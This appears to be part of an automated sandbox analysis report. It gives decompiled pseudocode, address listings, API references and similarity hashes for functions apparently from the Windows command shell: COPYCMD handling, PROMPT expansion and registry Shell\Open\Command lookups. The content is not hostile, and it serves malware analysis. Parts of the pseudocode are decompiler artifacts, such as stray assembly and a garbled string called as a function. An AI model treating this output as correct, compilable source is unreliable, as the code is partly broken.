							_t172 = E4A732148(_v532,  *0x4a770664 & 0x0000ffff);
							if(_t172 == 0) {
								_t173 = _v532;
							} else {
								_t173 = _t172 + 2;
							}
							if(E4A732148( *((intOrPtr*)( *_t144 + 0x10)),  *0x4a770664 & 0x0000ffff) == 0) {
								_t111 =  *((intOrPtr*)( *_t144 + 0x10));
							}
							E4A73185A(_t173, _t182 - (_t173 - _v532 >> 1), _t111);
						}
						_t145 = _v540;
						if(E4A732FAF(_t148, _t145, _a24,  &_v528) != 0) {
							goto L35;
						} else {
							_t183 = 0;
							 *0x4a754128 = 0;
							SetLastError(0);
							_t171 = _v544;
							 *_t171 =  *_t171 & 0;
							_t209 =  *((intOrPtr*)(E4A732ED1(_t145))) -  *0x4a770664; // 0x5c
							if(_t209 == 0) {
								_t96 = _t145;
								_t183 = 1;
								__eflags = 1;
								_t166 =  &(_t96[1]);
								do {
									_t150 =  *_t96;
									_t96 =  &(_t96[1]);
									__eflags = _t150;
								} while (_t150 != 0);
								_t148 = 0;
								 *((short*)(_t145 + (_t96 - _t166 >> 1) * 2 - 2)) = 0;
							}
							_t100 = GetFileAttributesW(_t145);
							if(_t100 != 0xffffffff) {
								__eflags = _t100 & 0x00000010;
								if((_t100 & 0x00000010) != 0) {
									_t183 = 1;
									 *_t171 = 1;
								}
								L30:
								if(_t183 != 0) {
									_t151 = E4A732148(_v532,  *0x4a770664 & 0x0000ffff);
									_t41 = _t151 + 2; // 0x2
									_t184 = _t41;
									do {
										_t167 =  *_t151;
										_t151 = _t151 + 2;
										__eflags = _t167;
									} while (_t167 != 0);
									_t153 = _t151 - _t184;
									__eflags = _t153;
									_t183 = _t153 >> 1;
									_t155 = _t145;
									_t166 =  &(_t155[1]);
									do {
										_t171 =  *_t155;
										_t155 =  &(_t155[1]);
										__eflags = _t171;
									} while (_t171 != 0);
									_t158 = _t155 - _t166 >> 1;
									_t148 = _t158 + _t183 + 1;
									__eflags = _t158 + _t183 + 1 - 0x104;
									if(_t158 + _t183 + 1 > 0x104) {
										goto L35;
									}
									E4A7320A9(_t183, _t145, _a24, _t102);
								}
								return E4A7313A9(0, _t145, _v8 ^ _t187, _t166, _t171, _t183);
							}
							_t106 = GetLastError();
							 *0x4a754128 = _t106;
							if(_t106 == 0 || _t106 == 2) {
								goto L30;
							} else {
								__eflags = _t106 - 3;
								if(_t106 == 3) {
									goto L30;
								}
								_push(_t106);
								goto L43;
							}
						}
					}
					if( *((short*)(E4A73413B(_t181))) != 0) {
						goto L42;
					}
					_t118 = _t181;
					_t19 = _t118 + 2; // 0x4
					_t166 = _t19;
					do {
						_t148 =  *_t118;
						_t118 = _t118 + 2;
					} while (_t148 != 0);
					if(_t118 - _t166 >> 1 > 0x104) {
						goto L35;
					}
					_t122 = _t181;
					_t20 = _t122 + 2; // 0x4
					_t166 = _t20;
					do {
						_t148 =  *_t122;
						_t122 = _t122 + 2;
					} while (_t148 != 0);
					E4A73185A(_t181, (_t122 - _t166 >> 1) + 1, E4A732598(_t148, _t181));
					_t128 =  *(_t181 + 2) & 0x0000ffff;
					if(_t128 != 0x3a) {
						__eflags =  *_t181 - 0x5c;
						if( *_t181 != 0x5c) {
							L48:
							_t129 =  *0x4a754124; // 0x0
							_v528 =  *_t129;
							_t131 = 0x3a;
							_v526 = _t131;
							__eflags = 0;
							_v524 = 0;
							_t133 =  &_v528;
							_t168 = _t133 + 2;
							do {
								_t161 =  *_t133;
								_t133 = _t133 + 2;
								__eflags = _t161;
							} while (_t161 != 0);
							_t135 = _t133 - _t168;
							__eflags = _t135;
							_t162 = _t181;
							_t136 = _t135 >> 1;
							_t55 = _t162 + 2; // 0x4
							_t166 = _t55;
							do {
								_t177 =  *_t162;
								_t162 = _t162 + 2;
								__eflags = _t177;
							} while (_t177 != 0);
							_t165 = _t162 - _t166 >> 1;
							_t148 = _t165 + _t136 + 1;
							__eflags = _t165 + _t136 + 1 - 0x104;
							if(_t165 + _t136 + 1 > 0x104) {
								goto L35;
							}
							E4A7320A9(_t181,  &_v528, 0x104, _t181);
							goto L18;
						}
						__eflags = _t128 - 0x5c;
						if(_t128 == 0x5c) {
							goto L17;
						}
						goto L48;
					}
					L17:
					E4A73185A( &_v528, 0x104, _t181);
					goto L18;
				} else {
					goto L1;
				}
				do {
					L1:
					_t142 =  *_t143;
					_t143 = _t143 + 2;
				} while (_t142 != 0);
				goto L2;
			}

0x4a73b589
0x4a73b594
0x4a73b59b
0x4a73b5a6
0x4a73b5b3
0x4a73b5bc
0x4a73b5cb
0x4a73b5d7
0x4a73b5e8
0x4a73b5f3
0x4a73b5ff
0x4a73b5ff
0x4a73b601
0x4a73b601
0x4a73b604
0x4a73b604
0x4a73b608
0x4a73b609
0x4a73b60e
0x4a73b612
0x4a73b614
0x4a745dab
0x4a745dab
0x4a745db0
0x4a745db0
0x4a745db5
0x4a745db5
0x00000000
0x4a745db5
0x4a73b620
0x4a740ea7
0x4a740ea7
0x00000000
0x4a740ea7
0x4a73b626
0x4a73b628
0x4a73b628
0x4a73b62b
0x4a73b62b
0x4a73b62f
0x4a73b630
0x4a73b630
0x4a73b645
0x4a73b64b
0x4a73b650
0x4a73b656
0x4a73b65b
0x00000000
0x00000000
0x4a73b661
0x4a73b661
0x4a73b669
0x4a745dbd
0x4a745dc5
0x4a745dce
0x4a745dcf
0x4a745dd8
0x4a73b6e1
0x4a73b6e1
0x4a73b6f3
0x00000000
0x00000000
0x4a73b6f9
0x4a73b707
0x4a73b71c
0x4a73b720
0x4a740eb1
0x4a73b726
0x4a73b727
0x4a73b727
0x4a73b73c
0x4a73b740
0x4a73b740
0x4a73b752
0x4a73b752
0x4a73b757
0x4a73b76f
0x00000000
0x4a73b775
0x4a73b775
0x4a73b778
0x4a73b77e
0x4a73b784
0x4a73b78a
0x4a73b795
0x4a73b79c
0x4a745e64
0x4a745e66
0x4a745e66
0x4a745e67
0x4a745e6a
0x4a745e6a
0x4a745e6e
0x4a745e6f
0x4a745e6f
0x4a745e78
0x4a745e7a
0x4a745e7a
0x4a73b7a3
0x4a73b7ac
0x4a73fe19
0x4a73fe1b
0x4a73fe23
0x4a73fe24
0x4a73fe24
0x4a73b7ca
0x4a73b7cc
0x4a740ea0
0x4a740ea2
0x4a740ea2
0x4a740ebc
0x4a740ebc
0x4a740ec0
0x4a740ec1
0x4a740ec1
0x4a740ec6
0x4a740ec6
0x4a740eca
0x4a740ecc
0x4a740ece
0x4a740ed1
0x4a740ed1
0x4a740ed5
0x4a740ed6
0x4a740ed6
0x4a740edd
0x4a740edf
0x4a740ee3
0x4a740ee9
0x00000000
0x00000000
0x4a740ef0
0x4a740ef0
0x4a73b7e2
0x4a73b7e2
0x4a73b7b2
0x4a73b7b8
0x4a73b7bf
0x00000000
0x4a745e84
0x4a745e84
0x4a745e87
0x00000000
0x00000000
0x4a745e8d
0x00000000
0x4a745e8d
0x4a73b7bf
0x4a73b76f
0x4a73b679
0x00000000
0x00000000
0x4a73b67f
0x4a73b681
0x4a73b681
0x4a73b684
0x4a73b684
0x4a73b688
0x4a73b689
0x4a73b697
0x00000000
0x00000000
0x4a73b69d
0x4a73b69f
0x4a73b69f
0x4a73b6a2
0x4a73b6a2
0x4a73b6a6
0x4a73b6a7
0x4a73b6bc
0x4a73b6c1
0x4a73b6c9
0x4a745de4
0x4a745de8
0x4a745df4
0x4a745df4
0x4a745dfc
0x4a745e05
0x4a745e06
0x4a745e0d
0x4a745e0f
0x4a745e16
0x4a745e1c
0x4a745e1f
0x4a745e1f
0x4a745e23
0x4a745e24
0x4a745e24
0x4a745e29
0x4a745e29
0x4a745e2b
0x4a745e2d
0x4a745e2f
0x4a745e2f
0x4a745e32
0x4a745e32
0x4a745e36
0x4a745e37
0x4a745e37
0x4a745e3e
0x4a745e40
0x4a745e49
0x4a745e4b
0x00000000
0x00000000
0x4a745e5a
0x00000000
0x4a745e5a
0x4a745dea
0x4a745dee
0x00000000
0x00000000
0x00000000
0x4a745dee
0x4a73b6cf
0x4a73b6dc
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73b5f5
0x4a73b5f5
0x4a73b5f5
0x4a73b5f9
0x4a73b5fa
0x00000000

APIs

Part of subcall function 4A73321B: _wcsnicmp.MSVCRT ref: 4A73329D

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

SetLastError.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000104,00000002,00000002,00000005,00000000,00000002,00000002,00000000), ref: 4A73B77E
GetFileAttributesW.KERNEL32(?,?), ref: 4A73B7A3
GetLastError.KERNEL32 ref: 4A73B7B2

Strings

COPYCMD, xrefs: 4A73B5C6

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AttributesFile_wcsnicmpiswspace
String ID: COPYCMD
API String ID: 2247692152-3727491224
Opcode ID: e08a8e486684de74be3e54a68669e62a77009a347740a15f3b6d601cefb00ebf
Instruction ID: 2f6c0051627d9776769281b4144d5a4ef1daf751a854d9ba383c561c2b780b5c
Opcode Fuzzy Hash: e08a8e486684de74be3e54a68669e62a77009a347740a15f3b6d601cefb00ebf
Instruction Fuzzy Hash: 0BA14735508616DBDB709F24CC98AEA3BB9EF59310F024194E986CF653E770DE4ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 4A73C60C, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A73C60C(signed int __ebx, void* __edx, void* __edi, short* __esi, void* __eflags) {
				intOrPtr* _t89;
				void* _t94;
				signed short _t96;
				intOrPtr* _t99;
				signed int _t102;
				WCHAR* _t103;
				WCHAR* _t105;
				signed int _t108;
				signed int _t110;
				intOrPtr* _t113;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t122;
				void* _t135;
				WCHAR* _t138;
				void* _t139;
				signed short _t140;
				void* _t141;
				void* _t144;
				void* _t145;
				WCHAR* _t146;
				WCHAR* _t147;
				intOrPtr _t149;
				short* _t152;
				void* _t155;
				void* _t156;
				void* _t159;
				void* _t164;

				_t152 = __esi;
				_t144 = __edx;
				_t132 = __ebx;
				_push(0x278);
				_push(0x4a73c798);
				E4A7313E1(__ebx, __edi, __esi);
				_t151 = 0;
				 *(_t155 - 0x280) = 0;
				_t159 =  *0x4a7541b4 - _t151; // 0x0
				if(_t159 != 0) {
					_push(0);
					_push(0x2335);
					E4A731E6C(E4A7399E1(_t135));
				}
				__eflags =  *0x4a75408c - _t151; // 0x1
				if(__eflags == 0) {
					L31:
					return E4A7313CA(_t132, _t151, _t152);
				} else {
					__eflags =  *0x4a754110 - _t151; // 0x0
					if(__eflags == 0) {
						_push(0x4a7545a8);
						E4A7358F3();
					}
					__eflags =  *0x4a754085;
					if( *0x4a754085 != 0) {
						goto L1;
					} else {
						_t132 = E4A732070(L"PROMPT");
						 *(_t155 - 0x278) = _t132;
						__eflags = _t132 - _t151;
						if(_t132 == _t151) {
							L14:
							_t151 = 0x4a755260;
							E4A732C56(_t132, _t144, 0x4a755260, 0x4a755260, 0x104, 0x4a755260);
							 *((intOrPtr*)(_t155 - 0x274)) = 0x4a755e40;
							 *0x4a755e40 = 0;
							 *((intOrPtr*)(_t155 - 0x270)) = 0x3ff;
							if(_t132 == 0 ||  *_t132 == 0) {
								E4A73179D(0x4a755e40, 0x3ff, L"%s>", _t151);
								_t89 = 0x4a755e40;
								_t78 = _t89 + 2; // 0x4a755e42
								_t145 = _t78;
								do {
									_t138 =  *_t89;
									_t89 = _t89 + 2;
									__eflags = _t138;
								} while (_t138 != 0);
								_t152 = 0x4a755e40 + (_t89 - _t145 >> 1) * 2;
								goto L30;
							} else {
								while(1) {
									_t96 =  *_t132 & 0x0000ffff;
									if(_t96 == 0) {
										break;
									}
									if(_t96 != 0x24) {
										E4A73179D(0x4a755e40,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8, _t96 & 0x0000ffff);
										_t156 = _t156 + 0x10;
										_t99 = 0x4a755e40;
										_t27 = _t99 + 2; // 0x4a755e42
										_t139 = _t27;
										do {
											_t146 =  *_t99;
											_t99 = _t99 + 2;
											__eflags = _t146;
										} while (_t146 != 0);
										_t102 = _t99 - _t139 >> 1;
										_t152 = 0x4a755e40 + _t102 * 2;
										 *((intOrPtr*)(_t155 - 0x274)) = _t152;
										 *((intOrPtr*)(_t155 - 0x270)) =  *((intOrPtr*)(_t155 - 0x270)) - _t102;
										_t103 = E4A73661C();
										__eflags = _t103;
										if(_t103 == 0) {
											L38:
											 *(_t155 - 0x280) =  *(_t155 - 0x280) & 0x00000000;
											L29:
											 *(_t155 - 0x278) =  *(_t155 - 0x278) + 2;
											_t132 =  *(_t155 - 0x278);
											continue;
										}
										_t105 = E4A74EAC4( *_t132 & 0x0000ffff);
										__eflags = _t105;
										if(_t105 == 0) {
											goto L38;
										}
										 *(_t155 - 0x280) =  *_t132 & 0x0000ffff;
										goto L29;
									}
									 *(_t155 - 0x278) = _t132 + 2;
									_t132 = 0;
									_t164 =  *0x4a754dc0 - _t132; // 0x50
									if(_t164 == 0) {
										L22:
										_t108 = _t132 * 6;
										if( *((short*)(0x4a754dc0 + _t108)) == 0) {
											break;
										}
										_t14 = _t108 + 0x4a754dc2; // 0x45000000
										_t140 =  *_t14 & 0x0000ffff;
										if(_t140 != 8) {
											_t110 = (_t140 & 0x0000ffff) - 1;
											__eflags = _t110 - 9;
											if(_t110 > 9) {
												L75:
												E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8,  *0x4a755260 & 0x0000ffff);
												_t156 = _t156 + 0x10;
												_t113 = _t152;
												_t77 = _t113 + 2; // 0x4a755e42
												_t141 = _t77;
												while(1) {
													_t147 =  *_t113;
													_t113 = _t113 + 2;
													__eflags = _t147;
													if(_t147 == 0) {
														break;
													}
												}
												L26:
												_t115 = _t113 - _t141;
												L27:
												_t116 = _t115 >> 1;
												L28:
												_t152 = _t152 + _t116 * 2;
												 *((intOrPtr*)(_t155 - 0x270)) =  *((intOrPtr*)(_t155 - 0x270)) - _t116;
												 *((intOrPtr*)(_t155 - 0x274)) = _t152;
												goto L29;
											}
											switch( *((intOrPtr*)(_t110 * 4 +  &M4A73CAEA))) {
												case 0:
													__eax = E4A73D701(__esi, 0, 1, __esi,  *(__ebp - 0x270));
													goto L28;
												case 1:
													__eax = E4A74270D(0, 1, __esi,  *(__ebp - 0x270));
													goto L28;
												case 2:
													E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), E4A732CB4, 0x4a755260);
													_t156 = _t156 + 0x10;
													_t118 = _t152;
													_t5 = _t118 + 2; // 0x4a755e42
													_t141 = _t5;
													do {
														_t148 =  *_t118;
														_t118 = _t118 + 2;
														__eflags = _t148;
													} while (_t148 != 0);
													goto L26;
												case 3:
													__ebp - 0x64 = E4A73D3B3(__ebp - 0x64, 0x20);
													__eax = __ebp - 0x64;
													__edi = E4A73C56B(__ecx, 0x2350, __ebp - 0x64);
													E4A73179D(__esi,  *(__ebp - 0x270), E4A732CB4, __edi) = LocalFree(__edi);
													__eax = __esi;
													_t41 =  &(__eax[1]); // 0x4a755e42
													__ecx = _t41;
													while(1) {
														__dx =  *__eax;
														__eax =  &(__eax[0]);
														__eax =  &(__eax[0]);
														__eflags = __dx;
														if(__dx == 0) {
															goto L26;
														}
													}
													goto L26;
												case 4:
													__eflags =  *((short*)(__ebp - 0x280));
													if( *((short*)(__ebp - 0x280)) == 0) {
														_push(0x4a770758);
													} else {
														_push(0x4a770760);
													}
													_push( *(__ebp - 0x270));
													_push(__esi);
													__eax = E4A73185A();
													__eax = __esi;
													_t44 =  &(__eax[1]); // 0x4a755e42
													__edx = _t44;
													do {
														__cx =  *__eax;
														__eax =  &(__eax[0]);
														__eax =  &(__eax[0]);
														__eflags = __cx;
													} while (__cx != 0);
													__eax = __eax - __edx;
													goto L27;
												case 5:
													__eax = E4A73185A(__esi,  *(__ebp - 0x270), 0x4a7545a8);
													__eax = __esi;
													_t46 =  &(__eax[1]); // 0x4a755e42
													__ecx = _t46;
													while(1) {
														__dx =  *__eax;
														__eax =  &(__eax[0]);
														__eax =  &(__eax[0]);
														__eflags = __dx;
														if(__dx == 0) {
															goto L26;
														}
													}
													goto L26;
												case 6:
													goto L75;
												case 7:
													__eflags =  *0x4a754081;
													if( *0x4a754081 == 0) {
														goto L29;
													}
													__eax = L4A74F169();
													__al = __al - 0x28;
													 *__eax = __eax +  *__eax;
													while(1) {
														__eflags =  *(__ebp - 0x270) - 1;
														if( *(__ebp - 0x270) <= 1) {
															goto L29;
														}
														__ecx = __eax;
														__eax = __eax - 1;
														__eflags = __ecx;
														if(__ecx == 0) {
															goto L29;
														}
														_push(0x2b);
														_pop(__ecx);
														 *__esi = __cx;
														__esi =  &(__esi[0]);
														__esi =  &(__esi[0]);
														 *(__ebp - 0x274) = __esi;
														_t48 = __ebp - 0x270;
														 *_t48 =  *(__ebp - 0x270) - 1;
														__eflags =  *_t48;
													}
													goto L29;
												case 8:
													__eflags =  *0x4a754081;
													if( *0x4a754081 == 0) {
														goto L29;
													}
													__ax =  *0x4a755260;
													 *(__ebp - 0x24) =  *0x4a755260;
													__ax =  *0x4a755262;
													 *((short*)(__ebp - 0x22)) = __ax;
													_push(0x5c);
													_pop(__eax);
													 *((short*)(__ebp - 0x20)) = __ax;
													__eax = 0;
													 *((short*)(__ebp - 0x1e)) = __ax;
													__eax = __ebp - 0x24;
													__eax = GetDriveTypeW(__ebp - 0x24);
													__eflags = __eax - 4;
													if(__eax != 4) {
														goto L29;
													}
													__eax = 0;
													 *((short*)(__ebp - 0x20)) = __ax;
													 *(__ebp - 0x284) = 0x104;
													 *(__ebp - 4) =  *(__ebp - 4) & 0;
													__eax = __ebp - 0x284;
													_push(__ebp - 0x284);
													__eax = __ebp - 0x26c;
													_push(__ebp - 0x26c);
													__eax = __ebp - 0x24;
													_push(__eax);
													L4A7524C5();
													 *(__ebp - 0x27c) = __eax;
													 *(__ebp - 4) = 0xfffffffe;
													asm("daa");
													__eflags =  *(__ebp - 0x27c);
													__ebp = 0xfffffd84;
													_t66 = __ecx + __edi - 0x7f;
													 *_t66 =  *(__ecx + __edi - 0x7f) + __dh;
													__eflags =  *_t66;
											}
										}
										_t15 = _t108 + 0x4a754dc4; // 0x8004500
										E4A73179D(_t152,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8,  *_t15 & 0x0000ffff);
										_t156 = _t156 + 0x10;
										_t122 = _t152;
										_t17 = _t122 + 2; // 0x4a755e42
										_t141 = _t17;
										do {
											_t149 =  *_t122;
											_t122 = _t122 + 2;
										} while (_t149 != 0);
										goto L26;
									}
									_t151 = 0x4a754dc0;
									while(towupper( *( *(_t155 - 0x278)) & 0x0000ffff) !=  *_t151) {
										_t132 = _t132 + 1;
										_t12 = 0x4a754dc0 + _t132 * 6; // 0x4a754dc1
										_t151 = _t12;
										if( *_t151 != 0) {
											continue;
										}
										goto L22;
									}
									goto L22;
								}
								L30:
								 *_t152 = 0;
								_t94 = E4A73C5A0(0x4a755e40);
								__eflags =  *0x4a7541b4;
								if( *0x4a7541b4 != 0) {
									E4A731E6C(_t94);
								}
								goto L31;
							}
						}
						E4A73185A(0x4a755480, 0x200, _t132);
						_t132 = 0x4a755480;
						 *0x4a754085 = 1;
						L13:
						 *(_t155 - 0x278) = _t132;
						goto L14;
					}
				}
				L1:
				_t132 = 0x4a755480;
				goto L13;
			}

0x4a73c60c
0x4a73c60c
0x4a73c60c
0x4a73c60c
0x4a73c611
0x4a73c616
0x4a73c61b
0x4a73c61d
0x4a73c623
0x4a73c629
0x4a73c7d6
0x4a73c7d7
0x4a73c7e3
0x4a73c7e3
0x4a73c62f
0x4a73c635
0x4a73c7d0
0x4a73c7d5
0x4a73c63b
0x4a73c63b
0x4a73c641
0x4a73c643
0x4a73c648
0x4a73c64d
0x4a73c64e
0x4a73c655
0x00000000
0x4a73c65b
0x4a73c665
0x4a73c667
0x4a73c66d
0x4a73c66f
0x4a73c691
0x4a73c697
0x4a73c69d
0x4a73c6a7
0x4a73c6af
0x4a73c6ba
0x4a73c6c2
0x4a73cab9
0x4a73cac1
0x4a73cac3
0x4a73cac3
0x4a73cac6
0x4a73cac6
0x4a73caca
0x4a73cacb
0x4a73cacb
0x4a73cad4
0x00000000
0x4a73c6d2
0x4a73c6d2
0x4a73c6d2
0x4a73c6d8
0x00000000
0x00000000
0x4a73c6e2
0x4a73c7fd
0x4a73c802
0x4a73c805
0x4a73c807
0x4a73c807
0x4a73c80a
0x4a73c80a
0x4a73c80e
0x4a73c80f
0x4a73c80f
0x4a73c816
0x4a73c818
0x4a73c81b
0x4a73c821
0x4a73c827
0x4a73c82c
0x4a73c82e
0x4a73c84b
0x4a73c84b
0x4a73c786
0x4a73c786
0x4a73c78d
0x00000000
0x4a73c78d
0x4a73c834
0x4a73c839
0x4a73c83b
0x00000000
0x00000000
0x4a73c840
0x00000000
0x4a73c840
0x4a73c6ea
0x4a73c6f0
0x4a73c6f2
0x4a73c6f9
0x4a73c728
0x4a73c72a
0x4a73c735
0x00000000
0x00000000
0x4a73c737
0x4a73c737
0x4a73c742
0x4a73c5c9
0x4a73c5ca
0x4a73c5cd
0x4a73ca80
0x4a73ca94
0x4a73ca99
0x4a73ca9c
0x4a73ca9e
0x4a73ca9e
0x4a73caa1
0x4a73caa1
0x4a73caa5
0x4a73caa6
0x4a73caa9
0x00000000
0x00000000
0x4a73caaf
0x4a73c773
0x4a73c773
0x4a73c775
0x4a73c775
0x4a73c777
0x4a73c777
0x4a73c77a
0x4a73c780
0x00000000
0x4a73c780
0x4a73c5d3
0x00000000
0x4a73c862
0x00000000
0x00000000
0x4a73c877
0x00000000
0x00000000
0x4a73c5eb
0x4a73c5f0
0x4a73c5f3
0x4a73c5f5
0x4a73c5f5
0x4a73c5f8
0x4a73c5f8
0x4a73c5fc
0x4a73c5fd
0x4a73c5fd
0x00000000
0x00000000
0x4a73c887
0x4a73c88c
0x4a73c89a
0x4a73c8b2
0x4a73c8b8
0x4a73c8ba
0x4a73c8ba
0x4a73c8bd
0x4a73c8bd
0x4a73c8c0
0x4a73c8c1
0x4a73c8c2
0x4a73c8c5
0x00000000
0x00000000
0x4a73c8cb
0x00000000
0x00000000
0x4a73c8cd
0x4a73c8d5
0x4a73c8de
0x4a73c8d7
0x4a73c8d7
0x4a73c8d7
0x4a73c8e3
0x4a73c8e9
0x4a73c8ea
0x4a73c8ef
0x4a73c8f1
0x4a73c8f1
0x4a73c8f4
0x4a73c8f4
0x4a73c8f7
0x4a73c8f8
0x4a73c8f9
0x4a73c8f9
0x4a73c8fe
0x00000000
0x00000000
0x4a73c911
0x4a73c916
0x4a73c918
0x4a73c918
0x4a73c91b
0x4a73c91b
0x4a73c91e
0x4a73c91f
0x4a73c920
0x4a73c923
0x00000000
0x00000000
0x4a73c929
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73c92b
0x4a73c932
0x00000000
0x00000000
0x4a73c938
0x4a73c939
0x4a73c93b
0x4a73c95e
0x4a73c95e
0x4a73c965
0x00000000
0x00000000
0x4a73c93f
0x4a73c941
0x4a73c942
0x4a73c944
0x00000000
0x00000000
0x4a73c94a
0x4a73c94c
0x4a73c94d
0x4a73c950
0x4a73c951
0x4a73c952
0x4a73c958
0x4a73c958
0x4a73c958
0x4a73c958
0x00000000
0x00000000
0x4a73c96d
0x4a73c974
0x00000000
0x00000000
0x4a73c97a
0x4a73c980
0x4a73c984
0x4a73c98a
0x4a73c98e
0x4a73c990
0x4a73c991
0x4a73c995
0x4a73c997
0x4a73c99b
0x4a73c99f
0x4a73c9a5
0x4a73c9a8
0x00000000
0x00000000
0x4a73c9ae
0x4a73c9b0
0x4a73c9b4
0x4a73c9be
0x4a73c9c1
0x4a73c9c7
0x4a73c9c8
0x4a73c9ce
0x4a73c9cf
0x4a73c9d2
0x4a73c9d3
0x4a73c9d8
0x4a73c9de
0x4a73c9e6
0x4a73ca0e
0x4a73ca0f
0x4a73ca14
0x4a73ca14
0x4a73ca14
0x00000000
0x4a73c5d3
0x4a73c748
0x4a73c75c
0x4a73c761
0x4a73c764
0x4a73c766
0x4a73c766
0x4a73c769
0x4a73c769
0x4a73c76d
0x4a73c76e
0x00000000
0x4a73c769
0x4a73c6fb
0x4a73c700
0x4a73c716
0x4a73c71c
0x4a73c71c
0x4a73c726
0x00000000
0x00000000
0x00000000
0x4a73c726
0x00000000
0x4a73c700
0x4a73c7b4
0x4a73c7b6
0x4a73c7be
0x4a73c7c3
0x4a73c7ca
0x4a73cae0
0x4a73cae0
0x00000000
0x4a73c7ca
0x4a73c6c2
0x4a73c67d
0x4a73c682
0x4a73c684
0x4a73c68b
0x4a73c68b
0x00000000
0x4a73c68b
0x4a73c655
0x4a73c1d3
0x4a73c1d3
0x00000000

APIs

towupper.MSVCRT ref: 4A73C70A

Strings

%s>, xrefs: 4A73CAB2
PROMPT, xrefs: 4A73C65B

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: towupper
String ID: %s>$PROMPT
API String ID: 2392615415-196086063
Opcode ID: 98765e0d391a2eecd7f3ff5fcaa2fb4c767da061ab0004e95dd5d8be5ad99779
Instruction ID: 509a0fe0f89dcb60a7e8541f49a36426d67c59f4732401cb0b17a32c0149fb19
Opcode Fuzzy Hash: 98765e0d391a2eecd7f3ff5fcaa2fb4c767da061ab0004e95dd5d8be5ad99779
Instruction Fuzzy Hash: 0D91237194CA22EADB719B64CC88AF63F79EB51301F030195E949DF443EB718A5DCB81

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D88B, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E4A74D88B(void* _a4, short* _a8) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				intOrPtr* _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				short* _t50;
				signed int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t59;
				char* _t61;
				signed int _t64;
				signed int _t74;
				signed int _t79;
				signed int _t86;
				signed int _t87;
				intOrPtr* _t88;
				char* _t92;
				signed int _t95;
				intOrPtr* _t100;
				signed int _t107;
				void* _t108;
				void* _t111;
				char* _t112;
				intOrPtr _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t118;
				void* _t119;
				void* _t120;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				void* _t126;

				_t48 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t48 ^ _t125;
				_t50 = _a8;
				_t108 = _a4;
				_t121 = 0;
				_v536 = _t108;
				if(_t50 != 0) {
					__eflags =  *_t50 - 0x2e;
					if( *_t50 != 0x2e) {
						_t107 = E4A7319D6(E4A732B0D(_t50, 0));
						_v532 = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							L19:
							_t54 = 1;
							L42:
							return E4A7313A9(_t54, _t107, _v8 ^ _t125, _t118, _t121, _t122);
						}
						_t56 = E4A732148(_t107, 0x20);
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = 0;
							 *_t56 = 0;
						}
						_t57 = _t107;
						_t30 = _t57 + 2; // 0x2
						_t119 = _t30;
						do {
							_t111 =  *_t57;
							_t57 = _t57 + 2;
							__eflags = _t111 - _t121;
						} while (_t111 != _t121);
						_t59 = _t57 - _t119;
						__eflags = _t59;
						_t121 = L"\\Shell\\Open\\Command";
						_t118 = _t59 >> 1;
						_t61 = L"\\Shell\\Open\\Command";
						_t112 =  &(_t61[2]);
						do {
							_t123 =  *_t61;
							_t61 =  &(_t61[2]);
							__eflags = _t123;
						} while (_t123 != 0);
						_t64 = _t61 - _t112 >> 1;
						_push(_t107);
						__eflags = _t64 + _t118 + 1 - 0x104;
						if(_t64 + _t118 + 1 <= 0x104) {
							_push(0x104);
							_push( &_v528);
							E4A73185A();
							E4A7320A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t107 = RegOpenKeyExW(_v536,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t107;
							if(__eflags == 0) {
								_push( &_v528);
								_push(_v536);
								_t74 = E4A74D003(_t107, _t121, 0x104, __eflags);
								_t122 = _t74;
								__eflags = _t122;
								if(_t122 == 0) {
									L39:
									E4A736D44(_t112, 0x400023a5, 1, _v532);
									L40:
									E4A73142E(_t122);
									E4A73142E(_v532);
									L41:
									_t54 = _t107;
									goto L42;
								}
								_t43 = _t74 + 2; // 0x2
								_t118 = _t43;
								do {
									_t112 =  *_t74;
									_t74 = _t74 + 2;
									__eflags = _t112;
								} while (_t112 != 0);
								_t79 = _t74 - _t118;
								__eflags = _t79;
								if(_t79 == 0) {
									goto L39;
								}
								_push(_t122);
								E4A7358F3(L"%s=%s\r\n", _v532);
								goto L40;
							}
							E4A736D44(_t112, 0x400023a5, 1, _v532);
							_t122 = _t107;
							_t107 = _v532;
							L31:
							E4A73142E(_t107);
							_t54 = _t122;
							goto L42;
						}
						_push(1);
						_push(0x400023db);
						E4A736D44(_t112);
						_t122 = 0x7b;
						goto L31;
					}
					E4A736D44(_t108, 0x400023a5, 1, _t50);
					_t54 = 0x7b;
					goto L42;
				}
				_t122 = 0x104;
				_push(0x104);
				_t86 =  &_v528;
				_push(_t86);
				_push(0);
				_push(_t108);
				_v532 = 0;
				"J$uJT$uJ^$uJh$uJr$uJ|$uJ"();
				_t107 = _t86;
